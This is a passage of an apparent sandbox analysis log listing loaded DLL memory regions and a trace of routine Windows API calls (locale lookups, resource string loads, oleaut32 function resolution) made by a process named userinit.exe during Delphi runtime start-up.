Region:
id = 5351
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5352
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5353
start_va = 0x1400000
end_va = 0x143ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 5354
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 5355
start_va = 0x2f80000
end_va = 0x31affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f80000"
filename = ""
Region:
id = 5356
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 5357
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 5358
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 5359
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 5360
start_va = 0x2ae0000
end_va = 0x2b9ffff
entry_point = 0x2ae0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 280
os_tid = 0x84c
[0167.652] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0167.652] GetKeyboardType (nTypeFlag=0) returned 4
[0167.652] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0167.652] GetStartupInfoA (in: lpStartupInfo=0x1afe34 | out: lpStartupInfo=0x1afe34*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0167.653] GetVersion () returned 0x1db10106
[0167.653] GetVersion () returned 0x1db10106
[0167.653] GetCurrentThreadId () returned 0x84c
[0167.653] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x1af930, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0167.653] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af80b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0167.653] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af920 | out: phkResult=0x1af920*=0x0) returned 0x2
[0167.653] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af920 | out: phkResult=0x1af920*=0x0) returned 0x2
[0167.653] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af920 | out: phkResult=0x1af920*=0x0) returned 0x2
[0167.653] lstrcpynA (in: lpString1=0x1af80b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0167.653] GetThreadLocale () returned 0x409
[0167.653] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x1af91b, cchData=5 | out: lpLCData="ENU") returned 4
[0167.654] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0167.654] lstrcpynA (in: lpString1=0x1af828, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0167.654] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0167.654] lstrcpynA (in: lpString1=0x1af828, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0167.655] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0167.655] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0167.655] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2c3640
[0167.655] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1180000
[0167.655] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2c4640
[0167.655] VirtualAlloc (lpAddress=0x1180000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1180000
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0167.656] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0167.657] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0167.657] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0167.657] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0167.657] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x1afa54, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0167.657] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x1afa40, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0167.657] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x1afa40, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0167.657] GetVersionExA (in: lpVersionInformation=0x1afdd8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1afdd8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0167.657] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0167.657] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0167.657] GetThreadLocale () returned 0x409
[0167.657] GetThreadLocale () returned 0x409
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Jan") returned 4
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="January") returned 8
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Feb") returned 4
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="February") returned 9
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Mar") returned 4
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="March") returned 6
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Apr") returned 4
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="April") returned 6
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="May") returned 4
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="May") returned 4
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Jun") returned 4
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="June") returned 5
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Jul") returned 4
[0167.657] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="July") returned 5
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Aug") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="August") returned 7
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Sep") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="September") returned 10
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Oct") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="October") returned 8
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Nov") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="November") returned 9
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Dec") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="December") returned 9
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Sun") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Sunday") returned 7
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Mon") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Monday") returned 7
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Tue") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Tuesday") returned 8
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Wed") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Wednesday") returned 10
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Thu") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Thursday") returned 9
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Fri") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Friday") returned 7
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Sat") returned 4
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x1afcb0, cchData=256 | out: lpLCData="Saturday") returned 9
[0167.658] GetThreadLocale () returned 0x409
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="$") returned 2
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="0") returned 2
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="0") returned 2
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x1afe04, cchData=2 | out: lpLCData=",") returned 2
[0167.658] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x1afe04, cchData=2 | out: lpLCData=".") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="2") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x1afe04, cchData=2 | out: lpLCData="/") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0167.659] GetThreadLocale () returned 0x409
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1afcd8, cchData=256 | out: lpLCData="1") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0167.659] GetThreadLocale () returned 0x409
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1afcd8, cchData=256 | out: lpLCData="1") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x1afe04, cchData=2 | out: lpLCData=":") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="AM") returned 3
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="PM") returned 3
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="0") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="0") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x1afd0c, cchData=256 | out: lpLCData="0") returned 2
[0167.659] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x1afe04, cchData=2 | out: lpLCData=",") returned 2
[0167.659] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0167.659] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0167.659] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0167.659] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0167.660] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0167.661] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0167.661] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0167.661] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0167.661] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0167.661] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0167.661] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0167.661] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0167.661] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0167.661] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0167.661] GetDC (hWnd=0x0) returned 0x6f01071a
[0167.662] GetDeviceCaps (hdc=0x6f01071a, index=90) returned 96
[0167.662] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0167.662] GetDC (hWnd=0x0) returned 0x6f01071a
[0167.662] GetDeviceCaps (hdc=0x6f01071a, index=104) returned 0
[0167.662] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0167.662] CreatePalette (plpal=0x1afa68) returned 0x7e080835
[0167.662] GetStockObject (i=7) returned 0x1b00017
[0167.662] GetStockObject (i=5) returned 0x1900015
[0167.662] GetStockObject (i=13) returned 0x18a002e
[0167.662] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0167.662] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0167.662] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0167.662] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
